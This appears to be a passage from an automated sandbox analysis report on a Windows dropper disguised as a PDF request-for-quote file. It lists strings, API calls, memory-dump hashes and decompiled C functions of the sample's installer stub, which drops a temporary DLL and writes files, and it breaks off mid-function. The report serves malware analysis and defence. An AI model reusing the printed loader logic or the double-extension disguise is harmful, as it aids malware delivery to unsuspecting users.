                                                                        • Inst, xrefs: 00402D19
                                                                        • Null, xrefs: 00402D2F
                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                        • soft, xrefs: 00402D26
                                                                        • Error launching installer, xrefs: 00402C8D
                                                                        • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                        • verifying installer: %d%%, xrefs: 00402D89
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                        • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                        • "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" , xrefs: 00402C41
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                        • String ID: "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                        • API String ID: 2181728824-1438877197
                                                                        • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                        • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                        • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                        • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E0040179D(FILETIME* __ebx, void* __eflags) {
                                                                        				void* _t33;
                                                                        				void* _t41;
                                                                        				void* _t43;
                                                                        				long _t49;
                                                                        				long _t62;
                                                                        				signed char _t63;
                                                                        				long _t64;
                                                                        				void* _t66;
                                                                        				long _t72;
                                                                        				FILETIME* _t73;
                                                                        				FILETIME* _t77;
                                                                        				signed int _t79;
                                                                        				void* _t82;
                                                                        				CHAR* _t84;
                                                                        				void* _t87;
                                                                        
                                                                        				_t77 = __ebx;
                                                                        				_t84 = E00402A9A(0x31);
                                                                        				 *(_t87 - 0x34) = _t84;
                                                                        				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
                                                                        				_t33 = E00405538(_t84);
                                                                        				_push(_t84);
                                                                        				if(_t33 == 0) {
                                                                        					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                        				} else {
                                                                        					_push(0x409c18);
                                                                        					E004059BF();
                                                                        				}
                                                                        				E00405BFB(0x409c18);
                                                                        				while(1) {
                                                                        					__eflags =  *(_t87 + 8) - 3;
                                                                        					if( *(_t87 + 8) >= 3) {
                                                                        						_t66 = E00405C94(0x409c18);
                                                                        						_t79 = 0;
                                                                        						__eflags = _t66 - _t77;
                                                                        						if(_t66 != _t77) {
                                                                        							_t73 = _t66 + 0x14;
                                                                        							__eflags = _t73;
                                                                        							_t79 = CompareFileTime(_t73, _t87 - 0x18);
                                                                        						}
                                                                        						asm("sbb eax, eax");
                                                                        						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                        						__eflags = _t72;
                                                                        						 *(_t87 + 8) = _t72;
                                                                        					}
                                                                        					__eflags =  *(_t87 + 8) - _t77;
                                                                        					if( *(_t87 + 8) == _t77) {
                                                                        						_t63 = GetFileAttributesA(0x409c18); // executed
                                                                        						_t64 = _t63 & 0x000000fe;
                                                                        						__eflags = _t64;
                                                                        						SetFileAttributesA(0x409c18, _t64); // executed
                                                                        					}
                                                                        					__eflags =  *(_t87 + 8) - 1;
                                                                        					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
                                                                        					__eflags = _t41 - 0xffffffff;
                                                                        					 *(_t87 - 8) = _t41;
                                                                        					if(_t41 != 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags =  *(_t87 + 8) - _t77;
                                                                        					if( *(_t87 + 8) != _t77) {
                                                                        						E00404D62(0xffffffe2,  *(_t87 - 0x34));
                                                                        						__eflags =  *(_t87 + 8) - 2;
                                                                        						if(__eflags == 0) {
                                                                        							 *((intOrPtr*)(_t87 - 4)) = 1;
                                                                        						}
                                                                        						L31:
                                                                        						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
                                                                        						__eflags =  *0x7a3008;
                                                                        						goto L32;
                                                                        					} else {
                                                                        						E004059BF(0x40a418, 0x7a4000);
                                                                        						E004059BF(0x7a4000, 0x409c18);
                                                                        						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll",  *((intOrPtr*)(_t87 - 0x10)));
                                                                        						E004059BF(0x7a4000, 0x40a418);
                                                                        						_t62 = E004052BF("C:\Users\jones\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll",  *(_t87 - 0x24) >> 3) - 4;
                                                                        						__eflags = _t62;
                                                                        						if(_t62 == 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							__eflags = _t62 == 1;
                                                                        							if(_t62 == 1) {
                                                                        								 *0x7a3008 =  *0x7a3008 + 1;
                                                                        								L32:
                                                                        								_t49 = 0;
                                                                        								__eflags = 0;
                                                                        							} else {
                                                                        								_push(0x409c18);
                                                                        								_push(0xfffffffa);
                                                                        								E00404D62();
                                                                        								L29:
                                                                        								_t49 = 0x7fffffff;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L33:
                                                                        					return _t49;
                                                                        				}
                                                                        				E00404D62(0xffffffea,  *(_t87 - 0x34));
                                                                        				 *0x4092a0 =  *0x4092a0 + 1;
                                                                        				_push(_t77);
                                                                        				_push(_t77);
                                                                        				_push( *(_t87 - 8));
                                                                        				_push( *((intOrPtr*)(_t87 - 0x1c)));
                                                                        				_t43 = E00402EBD(); // executed
                                                                        				 *0x4092a0 =  *0x4092a0 - 1;
                                                                        				__eflags =  *(_t87 - 0x18) - 0xffffffff;
                                                                        				_t82 = _t43;
                                                                        				if( *(_t87 - 0x18) != 0xffffffff) {
                                                                        					L22:
                                                                        					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
                                                                        				} else {
                                                                        					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
                                                                        					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
                                                                        						goto L22;
                                                                        					}
                                                                        				}
                                                                        				FindCloseChangeNotification( *(_t87 - 8)); // executed
                                                                        				__eflags = _t82 - _t77;
                                                                        				if(_t82 >= _t77) {
                                                                        					goto L31;
                                                                        				} else {
                                                                        					__eflags = _t82 - 0xfffffffe;
                                                                        					if(_t82 != 0xfffffffe) {
                                                                        						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
                                                                        					} else {
                                                                        						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
                                                                        						lstrcatA(0x409c18,  *(_t87 - 0x34));
                                                                        					}
                                                                        					_push(0x200010);
                                                                        					_push(0x409c18);
                                                                        					E004052BF();
                                                                        					goto L29;
                                                                        				}
                                                                        				goto L33;
                                                                        			}


















                                                                        0x0040179d
                                                                        0x004017a4
                                                                        0x004017ad
                                                                        0x004017b0
                                                                        0x004017b3
                                                                        0x004017b8
                                                                        0x004017c0
                                                                        0x004017dc
                                                                        0x004017c2
                                                                        0x004017c2
                                                                        0x004017c3
                                                                        0x004017c3
                                                                        0x004017e2
                                                                        0x004017ec
                                                                        0x004017ec
                                                                        0x004017f0
                                                                        0x004017f3
                                                                        0x004017f8
                                                                        0x004017fa
                                                                        0x004017fc
                                                                        0x00401801
                                                                        0x00401801
                                                                        0x0040180c
                                                                        0x0040180c
                                                                        0x0040181d
                                                                        0x0040181f
                                                                        0x0040181f
                                                                        0x00401820
                                                                        0x00401820
                                                                        0x00401823
                                                                        0x00401826
                                                                        0x00401829
                                                                        0x0040182f
                                                                        0x0040182f
                                                                        0x00401833
                                                                        0x00401833
                                                                        0x0040183b
                                                                        0x0040184a
                                                                        0x0040184f
                                                                        0x00401852
                                                                        0x00401855
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401857
                                                                        0x0040185a
                                                                        0x004018b4
                                                                        0x004018b9
                                                                        0x004015ca
                                                                        0x004026da
                                                                        0x004026da
                                                                        0x0040292f
                                                                        0x00402932
                                                                        0x00402932
                                                                        0x00000000
                                                                        0x0040185c
                                                                        0x00401862
                                                                        0x0040186d
                                                                        0x0040187a
                                                                        0x00401885
                                                                        0x0040189b
                                                                        0x0040189b
                                                                        0x0040189e
                                                                        0x00000000
                                                                        0x004018a4
                                                                        0x004018a4
                                                                        0x004018a5
                                                                        0x004018c2
                                                                        0x00402938
                                                                        0x00402938
                                                                        0x00402938
                                                                        0x004018a7
                                                                        0x004018a7
                                                                        0x004018a8
                                                                        0x00401495
                                                                        0x00402293
                                                                        0x00402293
                                                                        0x00402293
                                                                        0x004018a5
                                                                        0x0040189e
                                                                        0x0040293a
                                                                        0x0040293e
                                                                        0x0040293e
                                                                        0x004018d2
                                                                        0x004018d7
                                                                        0x004018dd
                                                                        0x004018de
                                                                        0x004018df
                                                                        0x004018e2
                                                                        0x004018e5
                                                                        0x004018ea
                                                                        0x004018f0
                                                                        0x004018f4
                                                                        0x004018f6
                                                                        0x004018fe
                                                                        0x0040190a
                                                                        0x004018f8
                                                                        0x004018f8
                                                                        0x004018fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004018fc
                                                                        0x00401913
                                                                        0x00401919
                                                                        0x0040191b
                                                                        0x00000000
                                                                        0x00401921
                                                                        0x00401921
                                                                        0x00401924
                                                                        0x0040193c
                                                                        0x00401926
                                                                        0x00401929
                                                                        0x00401932
                                                                        0x00401932
                                                                        0x00401941
                                                                        0x00401946
                                                                        0x0040228e
                                                                        0x00000000
                                                                        0x0040228e
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                        • CompareFileTime.KERNEL32(-00000014,?,Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                        • GetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,Ivlfdpdlcleoxmzl,00000000,00000000,Ivlfdpdlcleoxmzl,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                        • SetFileAttributesA.KERNELBASE(Ivlfdpdlcleoxmzl,00000000), ref: 00401833
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll$Ivlfdpdlcleoxmzl
                                                                        • API String ID: 1152937526-2160361936
                                                                        • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                        • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                                                        • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                                                        • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                                                        				struct _OVERLAPPED* _v8;
                                                                        				long _v12;
                                                                        				void* _v16;
                                                                        				long _v20;
                                                                        				long _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v92;
                                                                        				void* _t68;
                                                                        				void* _t69;
                                                                        				int _t74;
                                                                        				long _t75;
                                                                        				intOrPtr _t79;
                                                                        				long _t80;
                                                                        				void* _t82;
                                                                        				int _t84;
                                                                        				void* _t99;
                                                                        				void* _t100;
                                                                        				long _t101;
                                                                        				int _t102;
                                                                        				long _t103;
                                                                        				int _t104;
                                                                        				intOrPtr _t105;
                                                                        				long _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				_t102 = _a16;
                                                                        				_t99 = _a12;
                                                                        				_v12 = _t102;
                                                                        				if(_t99 == 0) {
                                                                        					_v12 = 0x8000;
                                                                        				}
                                                                        				_v8 = 0;
                                                                        				_v16 = _t99;
                                                                        				if(_t99 == 0) {
                                                                        					_v16 = 0x78d938;
                                                                        				}
                                                                        				_t66 = _a4;
                                                                        				if(_a4 >= 0) {
                                                                        					E004030FF( *0x7a2fd8 + _t66);
                                                                        				}
                                                                        				_t68 = E004030CD( &_a16, 4); // executed
                                                                        				if(_t68 == 0) {
                                                                        					L44:
                                                                        					_push(0xfffffffd);
                                                                        					goto L45;
                                                                        				} else {
                                                                        					if((_a19 & 0x00000080) == 0) {
                                                                        						if(_t99 != 0) {
                                                                        							if(_a16 < _t102) {
                                                                        								_t102 = _a16;
                                                                        							}
                                                                        							if(E004030CD(_t99, _t102) != 0) {
                                                                        								_v8 = _t102;
                                                                        								L47:
                                                                        								return _v8;
                                                                        							} else {
                                                                        								goto L44;
                                                                        							}
                                                                        						}
                                                                        						if(_a16 <= 0) {
                                                                        							goto L47;
                                                                        						}
                                                                        						while(1) {
                                                                        							_t103 = _v12;
                                                                        							if(_a16 < _t103) {
                                                                        								_t103 = _a16;
                                                                        							}
                                                                        							if(E004030CD(0x789938, _t103) == 0) {
                                                                        								goto L44;
                                                                        							}
                                                                        							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
                                                                        							if(_t74 == 0 || _t103 != _a12) {
                                                                        								L30:
                                                                        								_push(0xfffffffe);
                                                                        								L45:
                                                                        								_pop(_t69);
                                                                        								return _t69;
                                                                        							} else {
                                                                        								_v8 = _v8 + _t103;
                                                                        								_a16 = _a16 - _t103;
                                                                        								if(_a16 > 0) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L47;
                                                                        							}
                                                                        						}
                                                                        						goto L44;
                                                                        					}
                                                                        					_t75 = GetTickCount();
                                                                        					_t13 =  &_a16;
                                                                        					 *_t13 = _a16 & 0x7fffffff;
                                                                        					_v20 = _t75;
                                                                        					 *0x40b038 = 0xb;
                                                                        					 *0x40b050 = 0;
                                                                        					_a4 = _a16;
                                                                        					if( *_t13 <= 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					while(1) {
                                                                        						L10:
                                                                        						_t104 = 0x4000;
                                                                        						if(_a16 < 0x4000) {
                                                                        							_t104 = _a16;
                                                                        						}
                                                                        						if(E004030CD(0x789938, _t104) == 0) {
                                                                        							goto L44;
                                                                        						}
                                                                        						_a16 = _a16 - _t104;
                                                                        						 *0x40b028 = 0x789938;
                                                                        						 *0x40b02c = _t104;
                                                                        						while(1) {
                                                                        							_t100 = _v16;
                                                                        							 *0x40b030 = _t100;
                                                                        							 *0x40b034 = _v12;
                                                                        							_t79 = E00405D9D(0x40b028);
                                                                        							_v28 = _t79;
                                                                        							if(_t79 < 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t105 =  *0x40b030; // 0x78ed38
                                                                        							_t106 = _t105 - _t100;
                                                                        							_t80 = GetTickCount();
                                                                        							_t101 = _t80;
                                                                        							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                                                        								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                        								_t107 = _t107 + 0xc;
                                                                        								E00404D62(0,  &_v92);
                                                                        								_v20 = _t101;
                                                                        							}
                                                                        							if(_t106 == 0) {
                                                                        								if(_a16 > 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        								goto L47;
                                                                        							} else {
                                                                        								if(_a12 != 0) {
                                                                        									_v12 = _v12 - _t106;
                                                                        									_v8 = _v8 + _t106;
                                                                        									_t82 =  *0x40b030; // 0x78ed38
                                                                        									_v16 = _t82;
                                                                        									if(_v12 < 1) {
                                                                        										goto L47;
                                                                        									}
                                                                        									L25:
                                                                        									if(_v28 != 4) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L47;
                                                                        								}
                                                                        								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                                                        								if(_t84 == 0 || _v24 != _t106) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									_v8 = _v8 + _t106;
                                                                        									goto L25;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_push(0xfffffffc);
                                                                        						goto L45;
                                                                        					}
                                                                        					goto L44;
                                                                        				}
                                                                        			}



























                                                                        0x00402ec5
                                                                        0x00402ec9
                                                                        0x00402ed0
                                                                        0x00402ed3
                                                                        0x00402ed5
                                                                        0x00402ed5
                                                                        0x00402ede
                                                                        0x00402ee1
                                                                        0x00402ee4
                                                                        0x00402ee6
                                                                        0x00402ee6
                                                                        0x00402eed
                                                                        0x00402ef2
                                                                        0x00402efd
                                                                        0x00402efd
                                                                        0x00402f08
                                                                        0x00402f0f
                                                                        0x004030bb
                                                                        0x004030bb
                                                                        0x00000000
                                                                        0x00402f15
                                                                        0x00402f19
                                                                        0x0040305e
                                                                        0x004030ab
                                                                        0x004030ad
                                                                        0x004030ad
                                                                        0x004030b9
                                                                        0x004030c0
                                                                        0x004030c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004030b9
                                                                        0x00403063
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040306a
                                                                        0x0040306a
                                                                        0x00403070
                                                                        0x00403072
                                                                        0x00403072
                                                                        0x0040307e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040308b
                                                                        0x00403093
                                                                        0x00403058
                                                                        0x00403058
                                                                        0x004030bd
                                                                        0x004030bd
                                                                        0x00000000
                                                                        0x0040309a
                                                                        0x0040309a
                                                                        0x0040309d
                                                                        0x004030a4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004030a6
                                                                        0x00403093
                                                                        0x00000000
                                                                        0x0040306a
                                                                        0x00402f1f
                                                                        0x00402f25
                                                                        0x00402f25
                                                                        0x00402f2c
                                                                        0x00402f32
                                                                        0x00402f39
                                                                        0x00402f3f
                                                                        0x00402f42
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402f4d
                                                                        0x00402f4d
                                                                        0x00402f4d
                                                                        0x00402f55
                                                                        0x00402f57
                                                                        0x00402f57
                                                                        0x00402f63
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402f69
                                                                        0x00402f6c
                                                                        0x00402f72
                                                                        0x00402f78
                                                                        0x00402f78
                                                                        0x00402f83
                                                                        0x00402f89
                                                                        0x00402f8e
                                                                        0x00402f95
                                                                        0x00402f98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402f9e
                                                                        0x00402fa4
                                                                        0x00402fa6
                                                                        0x00402fb3
                                                                        0x00402fb5
                                                                        0x00402fe3
                                                                        0x00402fe9
                                                                        0x00402ff2
                                                                        0x00402ff7
                                                                        0x00402ff7
                                                                        0x00402ffe
                                                                        0x0040304c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403000
                                                                        0x00403003
                                                                        0x00403025
                                                                        0x00403028
                                                                        0x0040302b
                                                                        0x00403034
                                                                        0x00403037
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040303d
                                                                        0x00403041
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403047
                                                                        0x00403011
                                                                        0x00403019
                                                                        0x00000000
                                                                        0x00403020
                                                                        0x00403020
                                                                        0x00000000
                                                                        0x00403020
                                                                        0x00403019
                                                                        0x00402ffe
                                                                        0x00403054
                                                                        0x00000000
                                                                        0x00403054
                                                                        0x00000000
                                                                        0x00402f4d

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402F1F
                                                                        • GetTickCount.KERNEL32 ref: 00402FA6
                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                                                        • wsprintfA.USER32 ref: 00402FE3
                                                                        • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CountTick$FileWritewsprintf
                                                                        • String ID: ... %d%%$8x
                                                                        • API String ID: 4209647438-795837185
                                                                        • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                        • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                                                        • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                                                        • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 026C14D6
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 026C152F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocCreateFileVirtual
                                                                        • String ID: cc518e35fee648519f184090ec306ce4
                                                                        • API String ID: 1475775534-3371687070
                                                                        • Opcode ID: a4fb99792ff7ce8f09e5c46e9998f1ef9031e9a3d21052d9d41ff5d137be9c8d
                                                                        • Instruction ID: ba1df1ff393a6e6ddb6def2f0cd73c4a5f808391e7d422c330060c611843b076
                                                                        • Opcode Fuzzy Hash: a4fb99792ff7ce8f09e5c46e9998f1ef9031e9a3d21052d9d41ff5d137be9c8d
                                                                        • Instruction Fuzzy Hash: 75D14D30D44388EEEF21EBE4DC05BEDBBB5AF05714F20409AE608BA191D7B50B85DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 026C082F
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 026C09FC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656919763.00000000026C0000.00000040.00000001.sdmp, Offset: 026C0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: 6f3f5e3b86818eddb0a36baf9cd20a3296fd23fd6fb6ece333fab61561e8762a
                                                                        • Instruction ID: 60db3a196d955138b51fd156ab63b137695d87fd17490a320a117e758144ddfa
                                                                        • Opcode Fuzzy Hash: 6f3f5e3b86818eddb0a36baf9cd20a3296fd23fd6fb6ece333fab61561e8762a
                                                                        • Instruction Fuzzy Hash: 20A1FE70D00209EFEF14EBE4C885BBDBBB1EF08315F20849AE515BA2A1D3755A51DF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
                                                                        				int _t19;
                                                                        				struct _SECURITY_ATTRIBUTES* _t20;
                                                                        				signed char _t22;
                                                                        				struct _SECURITY_ATTRIBUTES* _t23;
                                                                        				CHAR* _t25;
                                                                        				struct _SECURITY_ATTRIBUTES** _t27;
                                                                        				struct _SECURITY_ATTRIBUTES** _t29;
                                                                        				void* _t30;
                                                                        
                                                                        				_t23 = __ebx;
                                                                        				_t25 = E00402A9A(0xfffffff0);
                                                                        				_t27 = E0040555F(_t25);
                                                                        				if( *_t25 != __ebx && _t27 != __ebx) {
                                                                        					do {
                                                                        						_t29 = E004054F7(_t27, 0x5c);
                                                                        						 *_t29 = _t23;
                                                                        						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                        						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                        						if(_t19 == 0) {
                                                                        							if(GetLastError() != 0xb7) {
                                                                        								L5:
                                                                        								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                        							} else {
                                                                        								_t22 = GetFileAttributesA(_t25); // executed
                                                                        								if((_t22 & 0x00000010) == 0) {
                                                                        									goto L5;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                        						 *_t29 = _t20;
                                                                        						_t27 =  &(_t29[0]);
